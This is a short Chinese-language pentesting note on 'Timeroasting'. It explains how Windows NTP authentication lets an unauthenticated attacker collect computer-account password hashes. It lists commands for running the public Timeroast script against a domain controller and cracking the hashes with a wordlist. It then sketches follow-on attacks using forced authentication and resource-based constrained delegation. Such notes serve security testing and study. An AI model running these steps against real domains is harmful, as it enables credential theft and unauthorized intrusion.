Timeroasting

原理

Timeroasting利用Windows的NTP身份验证机制,允许未经身份验证的攻击者通过发送带有该帐户的RID的NTP请求来有效地请求任何计算机帐户的密码哈希

利用

加入域的计算机没有密码,一般域用户创建的机器用户才有密码

利用SecuraBV/Timeroastarrow-up-right

chmod 777 Timeroast

python3 timeroast.py 10.0.0.42 | tee ntp-hashes.txt
# timeroast目录下的timeroast.py,IP为域控的IP

python3 timecrack.py ntp-hashes.txt pwd.txt
# pwd.txt是密码字典

利用场景

在域外的话其实可以利用域用户枚举去尝试获取机器用户名字,(如果在域内有域用户权限的话可以直接创建机器用户)

然后尝试去匹配机器用户名和密码,然后利用机器用户去域渗透,机器用户也是有域用户的一些功能

比如我可以利用机器用户去强制其他机器对kali机器进行身份认证,接下来可以(为域控机器)设置基于资源的约束委派,进行基于资源的约束委派的攻击

Last updated